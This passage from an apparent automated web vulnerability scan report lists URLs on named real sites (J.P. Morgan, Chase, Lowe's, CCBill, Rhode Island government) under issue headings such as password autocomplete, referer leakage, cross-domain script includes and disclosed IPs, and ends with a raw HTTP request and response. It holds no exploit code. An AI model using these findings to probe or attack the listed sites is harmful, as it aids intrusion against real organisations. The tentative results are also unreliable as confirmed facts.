11.260. http://www.jpmorgan.com/images/thrd_client_tab_left2.jpg
11.261. http://www.jpmorgan.com/images/thrd_client_tab_right2.jpg
11.262. http://www.jpmorgan.com/images/thrd_subnav_arrow.gif
11.263. http://www.jpmorgan.com/images/thrd_subnav_dottedline.jpg
11.264. http://www.jpmorgan.com/images/thumb_am_62.jpg
11.265. http://www.jpmorgan.com/images/thumb_cb_62.jpg
11.266. http://www.jpmorgan.com/images/thumb_ib_62.jpg
11.267. http://www.jpmorgan.com/images/thumb_pb_62.jpg
11.268. http://www.jpmorgan.com/images/thumb_ts_62.jpg
11.269. http://www.jpmorgan.com/images/thumb_wss_62.jpg
11.270. http://www.jpmorgan.com/images/ts/images_2008/background_subpage.jpg
11.271. http://www.jpmorgan.com/images/ts/images_2008/footer_pixel.gif
11.272. http://www.jpmorgan.com/images/ts/images_2008/logo_jpm.gif
11.273. http://www.jpmorgan.com/images/ts/images_2008/navbar_map.gif
11.274. http://www.jpmorgan.com/images/ts/images_2008/scnd_body_arrow.gif
11.275. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab.jpg
11.276. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab_left.jpg
11.277. http://www.jpmorgan.com/images/ts/images_2008/scnd_onstate_arrow.jpg
11.278. http://www.jpmorgan.com/images/ts/images_2008/scnd_tab_bar_pixel.jpg
11.279. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_left2.jpg
11.280. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_right2.jpg
11.281. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_arrow.gif
11.282. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_dottedline.jpg
11.283. http://www.jpmorgan.com/images/ts/imgs/icon_arrow_up.gif
11.284. http://www.jpmorgan.com/images/ts/js/global.js
11.285. http://www.jpmorgan.com/pages/jpmorgan/am
11.286. http://www.jpmorgan.com/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM
11.287. http://www.jpmorgan.com/pages/jpmorgan/am/uk
11.288. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office
11.290. http://www.jpmorgan.com/pages/jpmorgan/am/usa
11.291. http://www.jpmorgan.com/pages/jpmorgan/clientlogon
11.292. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx
11.293. http://www.jpmorgan.com/pages/jpmorgan/private_banking
11.294. http://www.jpmorgan.com/script/jpmVideoPlayerHelper.js
11.295. http://www.jpmorgan.com/script/jquery-1.2.6.min.js
11.296. http://www.jpmorgan.com/script/jquery-1.3.2.min.js
11.297. http://www.jpmorgan.com/script/jquery.bgiframe.min.js
11.298. http://www.jpmorgan.com/script/jquery.pngFix.pack.js
11.299. http://www.jpmorgan.com/script/jquery_jpm_custom.js
11.300. http://www.jpmorgan.com/script/lightbox_support/builder.js
11.301. http://www.jpmorgan.com/script/lightbox_support/controls.js
11.302. http://www.jpmorgan.com/script/lightbox_support/dragdrop.js
11.303. http://www.jpmorgan.com/script/lightbox_support/effects.js
11.304. http://www.jpmorgan.com/script/lightbox_support/prototype.js
11.305. http://www.jpmorgan.com/script/lightbox_support/scriptaculous.js
11.306. http://www.jpmorgan.com/script/lightbox_support/slider.js
11.307. http://www.jpmorgan.com/script/lightbox_support/sound.js
11.308. http://www.jpmorgan.com/script/lightview.js
11.309. http://www.jpmorgan.com/script/swfobject.js
11.310. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594
11.311. http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
11.312. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254
11.314. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png
11.315. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png
11.316. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png
11.318. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png
11.320. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg
11.321. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_cooling.png
11.322. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_decking.png
11.323. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area4_vanity.png
11.324. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png
11.325. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg
11.326. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area4_Clearance.png
11.327. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png
11.328. http://www.lowes.com/campaign/summer/2011/images/homepage/20110706_control_Flooring.png
11.329. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg
11.330. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg
11.331. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Bali.png
11.332. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_OPE.png
11.333. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Shutters.png
11.334. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Tools.png
11.335. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png
11.336. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png
11.337. http://www.lowes.com/campaign/summer/2011/images/homepage/arrow_status.png
11.338. http://www.lowes.com/campaign/summer/2011/images/homepage/bullet.png
11.339. http://www.lowes.com/campaign/summer/2011/images/homepage/green_background.png
11.340. http://www.lowes.com/images/auxnav/auxnavbg.png
11.341. http://www.lowes.com/images/bg-category-li.gif
11.342. http://www.lowes.com/images/bg-page.gif
11.343. http://www.lowes.com/images/blank.gif
11.344. http://www.lowes.com/images/category-corner.png
11.345. http://www.lowes.com/images/category-right-cover.gif
11.346. http://www.lowes.com/images/cover.gif
11.347. http://www.lowes.com/images/sprites/buttons.png
11.348. http://www.lowes.com/images/sprites/global.png
11.349. http://www.lowes.com/pc_Flooring_4294934373_4294937087_
11.350. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css
11.351. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css
11.352. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css
11.353. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css
11.354. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css
11.355. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css
11.356. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css
11.357. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css
11.358. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
11.359. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/print.css
11.360. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif
11.361. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js
11.362. http://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
11.363. https://www.lowes.com/server-status
11.364. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
11.365. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js
11.367. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js
11.368. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js
11.369. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
11.370. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
11.371. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
11.372. http://www.ox.popcap.com/delivery/afr.php
11.373. https://www.ri.gov/Licensing/renewal/license.php
11.374. http://www.uscg.mil/safetylevels/levels.js
11.375. http://www7.lowes.com/eluminate
11.376. http://www7.lowes.com/eluminate
12. Password field with autocomplete enabled
12.1. https://admin.ccbill.com/loginMM.cgi
12.2. https://affiliateadmin.ccbill.com/
12.4. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
12.5. http://apps.ccbill.com/p/developer.html
12.6. https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx
12.7. https://store.popcap.com/payment.php
12.8. https://store.popcap.com/payment.php
12.9. https://store.popcap.com/payment.php
12.13. http://ucc.state.ri.us/loginsystem/login_form.asp
12.14. http://www.citizencorps.gov/
12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
13.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework
13.3. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js
13.4. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js
13.5. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js
13.6. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js
14. Referer-dependent response
14.1. https://admin.ccbill.com/style/css/images/text-bg.gif
14.2. http://bstats.adbrite.com/click/bstats.gif
14.3. http://www.facebook.com/plugins/like.php
14.4. http://www.facebook.com/plugins/likebox.php
14.5. http://www.youtube.com/embed/IHmPw1HsCe4
15.1. http://www.dhs.gov/index.shtm
16. Cross-domain Referer leakage
16.1. http://fls.doubleclick.net/activityi
16.2. http://fls.doubleclick.net/activityi
16.3. http://fls.doubleclick.net/activityi
16.4. http://itunes.apple.com/us/app/katango/id447742732
16.5. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js
16.6. http://ucc.state.ri.us/loginsystem/login.asp
16.7. http://ucc.state.ri.us/ucc/uccmenu.asp
16.8. https://www.chase.com/ccp/index.jsp
16.9. https://www.chase.com/ccp/index.jsp
16.10. http://www.facebook.com/plugins/like.php
16.11. http://www.facebook.com/plugins/likebox.php
16.12. http://www.facebook.com/plugins/likebox.php
16.13. http://www.facebook.com/plugins/likebox.php
16.14. http://www.google.com/search
16.15. http://www.google.com/search
16.16. http://www.google.com/search
16.17. http://www.imiclk.com/cgi/r.cgi
16.18. http://www.imiclk.com/cgi/r.cgi
16.19. http://www.interactivemediaawards.com/winners/certificate.asp
16.20. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx
16.22. http://www.lowes.com/pc_Flooring_4294934373_4294937087_
16.23. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
16.24. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
16.28. http://www.ox.popcap.com/delivery/afr.php
16.29. https://www.ri.gov/information/
16.30. https://www.ri.gov/search/
16.31. https://www.ri.gov/visit/
17. Cross-domain script include
17.1. http://511.dot.ri.gov/hb/main.jsf
17.2. http://blog.katango.com/
17.3. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/
17.4. http://itunes.apple.com/us/app/katango/id447742732
17.5. https://store.popcap.com/payment.php
17.7. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html
17.8. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html
17.9. http://trustedcs.com/products/cross_domain.html
17.11. http://www.akqa.com/approach
17.12. http://www.akqa.com/contact/san-francisco
17.13. http://www.akqa.com/library/js/akqa.devicemanager.js
17.14. http://www.akqa.com/work/volkswagen/real-racing-gti
17.15. http://www.akqa.com/work/warner-brothers/221b
17.17. http://www.ccbill.com/developers/faq.php
17.18. http://www.ccbill.com/developers/index.php
17.19. http://www.ccbill.com/developers/security/security-rewards-program.php
17.20. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
17.21. https://www.ccbill.com/developers/index.php
17.22. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php
17.23. http://www.facebook.com/plugins/likebox.php
17.24. http://www.interactivemediaawards.com/winners/certificate.asp
17.25. http://www.jpmorgan.com/pages/jpmorgan/am/usa
17.26. http://www.jpmorganchase.com/corporate/Home/home.htm
17.27. http://www.ox.popcap.com/delivery/afr.php
17.28. http://www.ri.gov/press/view/14202
17.29. http://www.riema.ri.gov/
17.30. http://www.youtube.com/embed/IHmPw1HsCe4
17.31. http://www6.homedepot.com/how-to/index.html
18.1. http://bh.contextweb.com/
18.2. http://image2.pubmatic.com/
18.3. http://pixel.rubiconproject.com/
18.4. http://www.iavisarts.org/
19.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome
19.2. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js
19.3. https://admin.ccbill.com/ext-2.2/custom/combos.css
19.4. https://admin.ccbill.com/ext-2.2/ext-all.js
19.5. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css
19.6. https://admin.ccbill.com/loginIndex.cgi
19.7. https://admin.ccbill.com/loginMM.cgi
19.8. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
19.9. http://apps.ccbill.com/p/developer.html
19.10. http://apps.ccbill.com/tmp/cache/intelli.config.js
19.11. http://apps.ccbill.com/tmp/cache/intelli.lang.en.js
19.12. http://blog.katango.com/osd.xml
19.13. http://bstats.adbrite.com/click/bstats.gif
19.14. http://ec.ox.popcap.com/popcap/js/jquery/plugins/jquery.cookie.js
19.15. https://iblogin.jpmorgan.com/sso/action/federateLogin
19.16. https://iblogin.jpmorgan.com/sso/action/federateLogin
19.17. https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername
19.18. https://iblogin.jpmorgan.com/sso/action/web_GetForgotUsername
19.19. https://iblogin.jpmorgan.com/sso/action/web_NeedHelp
19.20. http://ocsp.thawte.com/
19.21. http://sos.ri.gov/business/acknowledgements/
19.22. http://sos.ri.gov/business/filings/annualreports/
19.23. http://sos.ri.gov/business/filings/businessforms/
19.24. http://sos.ri.gov/elections/voters/register/
19.25. https://store.popcap.com/js/jquery/plugins/jquery.cookie.js
19.26. https://support.ccbill.com/
19.27. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html
19.28. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html
19.29. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
19.30. http://ucc.state.ri.us/loginsystem/login_form.asp
19.31. http://www.211ri.org/js/prototype.js
19.32. http://www.akqa.com/contact/san-francisco
19.33. http://www.akqa.com/library/js/jquery.jqtransform-1.1.custom.min.js
19.34. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
19.35. https://www.chase.com/online/includes/javascript/jquery.url.js
19.36. http://www.citizencorps.gov/css/navDynamic.css
19.37. http://www.ct.gov/demhs/assets/templates/41/textsizer.js
19.38. http://www.ct.gov/demhs/site/default.asp
19.39. http://www.doit.ri.gov/directions/index.php
19.40. http://www.doit.ri.gov/news/projects/index.php
19.41. http://www.doit.ri.gov/search/index.php/
19.42. http://www.doit.ri.gov/search/index.php/captcha.php
19.43. http://www.fema.gov/css/text-styles.css
19.44. http://www.homedepot.com/lithium-handling.js
19.45. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js
19.46. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js
19.48. http://www.jpmorgan.com/script/jquery.pngFix.pack.js
19.49. http://www.jpmorgan.com/script/lightbox_support/controls.js
19.50. http://www.jpmorganchase.com/corporate/includes/javascript/jScrollTouch.js
19.51. http://www.jpmorganchase.com/corporate/includes/javascript/jquery.cookie.js
19.52. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
19.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
19.54. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
19.55. http://www.popcap.com/js/jquery/plugins/jquery.cookie.js
19.56. http://www.ri.gov/js/fontsizer.js
19.57. http://www.ri.gov/js/jquery_cookie.js
19.58. http://www.ri.gov/opengovernment/
19.59. http://www.ri.gov/plugins/mozilla_search.xml
19.60. http://www.ri.gov/styles/ui-widgets.css
19.61. http://www.ri.gov/subscriber/
19.62. https://www.ri.gov/about/
19.63. https://www.ri.gov/about/staff.php
19.64. https://www.ri.gov/js/fontsizer.js
19.65. https://www.ri.gov/js/jquery_cookie.js
19.66. https://www.ri.gov/styles/ui-widgets.css
19.67. http://www.riema.ri.gov/contact/
19.68. http://www.riema.ri.gov/js/jquery.cdc.ticker.js
19.69. http://www.us-cert.gov/cas/tips/
20. Private IP addresses disclosed
20.1. http://blogs.adobe.com/psirt/
20.2. http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories
20.3. http://blogs.adobe.com/psirt/category/uncategorized
20.4. https://iblogin.jpmorgan.com/sso/morcom/css/style.css
20.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php
20.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php
20.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php
20.8. http://platform.ak.fbcdn.net/www/app_full_proxy.php
20.9. http://platform.ak.fbcdn.net/www/app_full_proxy.php
20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/LHnm6CafkJe.js
20.11. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/2YGnqSRbxUI.css
20.12. https://store.popcap.com/payment.php
20.13. http://www.facebook.com/ajax/connect/connect_widget.php
20.14. http://www.facebook.com/plugins/like.php
20.15. http://www.facebook.com/plugins/like.php
20.16. http://www.facebook.com/plugins/likebox.php
20.17. http://www.facebook.com/plugins/likebox.php
20.18. http://www.facebook.com/plugins/likebox.php
20.19. http://www.facebook.com/plugins/likebox.php
20.20. http://www.facebook.com/plugins/likebox.php
20.21. http://www.google.com/sdch/vD843DpA.dct
20.22. https://www.lowes.com/server-status
20.23. https://www.lowes.com/server-status
20.24. http://www.us-cert.gov/cas/tips/
21. Credit card numbers disclosed
22.1. http://1.gravatar.com/blavatar/183104b8582a0b2533f9416c5f5d53fe
22.2. https://admin.ccbill.com/
22.3. http://apps.ccbill.com/favicon.ico
22.4. http://at.amgdgt.com/ads/
22.5. http://b.scorecardresearch.com/b
22.6. http://blog.katango.com/
22.7. http://blogs.adobe.com/psirt/
22.8. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm
22.9. http://itunes.apple.com/WebObjects/MZStore.woa/wa/ajaxCache
22.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
22.11. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur
22.13. http://mtrcs.popcap.com/b/ss/popcapcom/1/H.21/s25055282826069
22.14. http://pixel.mathtag.com/data/img
22.15. http://s.gravatar.com/js/gprofiles.js
22.16. http://s0.wp.com/wp-content/themes/h4/global.css
22.17. http://s1.wp.com/wp-includes/js/l10n.js
22.18. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css
22.19. http://stats.adobe.com/b/ss/mxmacromedia/1/H.23.3/s22758062051143
22.20. http://tag.admeld.com/pixel
22.22. http://www.apple.com/itunes
22.23. http://www.burstnet.com/enlightn/8171/99D2/
22.24. http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536
22.25. http://www.imiclk.com/cgi/r.cgi
22.26. http://www.interactivemediaawards.com/winners/certificate.asp
22.28. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
22.29. http://www.ox.popcap.com/delivery/afr.php
22.30. http://www.popcap.com/favicon.ico
22.31. http://www.youtube.com/embed/IHmPw1HsCe4
22.32. http://www7.lowes.com/eluminate
23.1. https://access.jpmorgan.com/content/tssweb/shared/document/PP403.html
23.2. https://admin.ccbill.com/favicon.ico
23.3. https://admin.ccbill.com/loginIndex.cgi
23.4. https://admin.ccbill.com/loginMM.cgi
23.5. https://affiliateadmin.ccbill.com/
23.6. https://affiliateadmin.ccbill.com/favicon.ico
23.7. https://pwr.jpmorgan.com/pwreset/forgotp1.validateuserdsp.epr
23.8. https://pwr.jpmorgan.com/pwreset/forgotp1.validateusersubmit.epr
23.9. https://store.popcap.com/js/s_code.php
23.10. https://support.ccbill.com/
23.11. https://www.ccbill.com/developers/index.php
23.12. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php
23.13. https://www.ccbill.com/favicon.ico
23.15. https://www.chase.com/ccp/index.jsp
23.16. https://www.chase.com/ccpmweb/shared/document/webtrends.html
23.17. https://www.chase.com/index.jsp
23.18. https://www.chase.com/online/Checking/gift-card.htm
23.19. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm
23.20. https://www.chase.com/psmhelp/index.jsp
23.21. https://www.lowes.com/server-status
23.22. https://www.ri.gov/Licensing/
23.23. https://www.ri.gov/about/
23.24. https://www.ri.gov/about/awards.php
23.25. https://www.ri.gov/about/staff.php
23.26. https://www.ri.gov/government/
23.27. https://www.ri.gov/help/
23.28. https://www.ri.gov/img/favicon.ico
23.29. https://www.ri.gov/information/
23.30. https://www.ri.gov/phonebook/
23.31. https://www.ri.gov/policies/
23.32. https://www.ri.gov/policies/access/
23.33. https://www.ri.gov/policies/disclaimer/
23.34. https://www.ri.gov/policies/legal/
23.35. https://www.ri.gov/policies/links/
23.36. https://www.ri.gov/policies/privacy/
23.37. https://www.ri.gov/search/
23.38. https://www.ri.gov/towns/
23.39. https://www.ri.gov/type/junction_02-webfont.woff
23.40. https://www.ri.gov/visit/
24. Multiple content types specified
24.2. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html
24.3. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html
24.4. http://trustedcs.com/products/cross_domain.html
25. HTML does not specify charset
25.2. http://fls.doubleclick.net/activityi
25.3. https://store.popcap.com/js/s_code.php
25.4. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp
25.5. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
25.6. http://ucc.state.ri.us/loginsystem/login_form.asp
25.7. http://ucc.state.ri.us/ucc/uccmenu.asp
25.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp
25.9. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm
25.10. http://www.citizencorps.gov/includes/facts.json
25.11. http://www.ct.gov/favicon.ico
25.12. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm
25.13. http://www.interactivemediaawards.com/favicon.ico
25.14. http://www.jpmorgan.com/
25.15. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png
25.16. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg
25.17. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html
25.18. https://www.lowes.com/MContent/Structured/MastheadArea/projects/bath.html
25.19. https://www.lowes.com/MContent/Structured/MastheadArea/projects/kitchen.html
25.20. https://www.lowes.com/MContent/Structured/MastheadArea/projects/laundry.html
25.21. http://www.popcap.com/js/s_code.php
25.22. http://www.readability.com/embed.js
25.23. http://www.readability.com/static/embed/embed.html
25.24. http://www2.tmc.state.ri.us/
26. HTML uses unrecognised charset
27. Content type incorrectly stated
27.1. http://apps.ccbill.com/favicon.ico
27.2. http://apps.ccbill.com/includes/common/category-icons/default.gif
27.3. http://ext.homedepot.com/www/esi/external/include.php
27.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
27.5. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur
27.6. http://sr2.liveperson.net/hcp/html/mTag.js
27.7. https://store.popcap.com/js/s_code.php
27.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp
27.9. http://www.ccbill.com/favicon.ico
27.10. http://www.ccbill.com/signup/trans.cgi
27.11. https://www.ccbill.com/favicon.ico
27.12. http://www.citizencorps.gov/includes/facts.json
27.13. http://www.doit.ri.gov/favicon.ico
27.14. http://www.google.com/search
27.15. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json
27.16. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif
27.20. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png
27.21. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png
27.22. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png
27.23. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json
27.24. http://www.jpmorgan.com/cm/BlobServer
27.25. http://www.jpmorgan.com/cm/Satellite
27.26. http://www.jpmorgan.com/favicon.ico
27.27. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg
27.28. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js
27.29. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html
27.30. http://www.mass.gov/favicon.ico
27.31. http://www.popcap.com/js/s_code.php
27.32. http://www.readability.com/embed.js
27.33. http://www.res-x.com/ws/r2/Resonance.aspx
27.34. http://www.ri.gov/favicon.ico
27.35. http://www.ri.gov/img/favicon.ico
27.36. http://www.ri.gov/img/governmentbox/seal.gif
27.37. http://www.ri.gov/type/junction_02-webfont.woff
27.38. https://www.ri.gov/img/favicon.ico
27.39. https://www.ri.gov/type/junction_02-webfont.woff
27.40. http://www.riema.ri.gov/favicon.ico
27.41. http://www.us-cert.gov/favicon.ico
27.42. http://www6.homedepot.com/favicon.ico
27.43. http://www6.homedepot.com/how-to/assets/images/modal/lightbox-close.png
Severity: | High |
Confidence: | Tentative |
Host: | http://www.jpmorgan.com |
Path: | /pages/jpmorgan/investbk |
GET /pages/jpmorgan/investbk Host: www.jpmorgan.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ARPT=NKOJWQS188.20 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT Date: Tue, 12 Jul 2011 15:30:02 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: ARPT=NKOJWQS188.21 Set-Cookie: JpmcSession=Vpm1Tcyh P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 61889 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" xml:lang="en" xmlns="http://www.w3.org <!-- page_id: 1159296860718 --> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Foreign Exchange | J.P. Morgan</title> <META NAME="jpmc_lob" CONTENT="Investment Bank" /> <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" /> <meta name="google-site <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-20028469-1']); _gaq.push(['_trackPa (function() { var ga = document.createElement( ga.src = ('https:' == document.location var s = document.getElements })(); </script> <META NAME="ROBOTS" CONTENT="index,follow <META NAME="GOOGLEBOT" CONTENT="NOODP"> <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM ...[SNIP]... |
GET /pages/jpmorgan/investbk Host: www.jpmorgan.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ARPT=NKOJWQS188.20 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT Date: Tue, 12 Jul 2011 15:30:03 GMT Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: ARPT=NKOJWQS188.20 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 61889 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" xml:lang="en" xmlns="http://www.w3.org <!-- page_id: 1159296860718 --> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Foreign Exchange | J.P. Morgan</title> <META NAME="jpmc_lob" CONTENT="Investment Bank" /> <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" /> <meta name="google-site <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-20028469-1']); _gaq.push(['_trackPa (function() { var ga = document.createElement( ga.src = ('https:' == document.location var s = document.getElements })(); </script> <META NAME="ROBOTS" CONTENT="index,follow <META NAME="GOOGLEBOT" CONTENT="NOODP"> <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite? ...[SNIP]... |
Severity: | High |
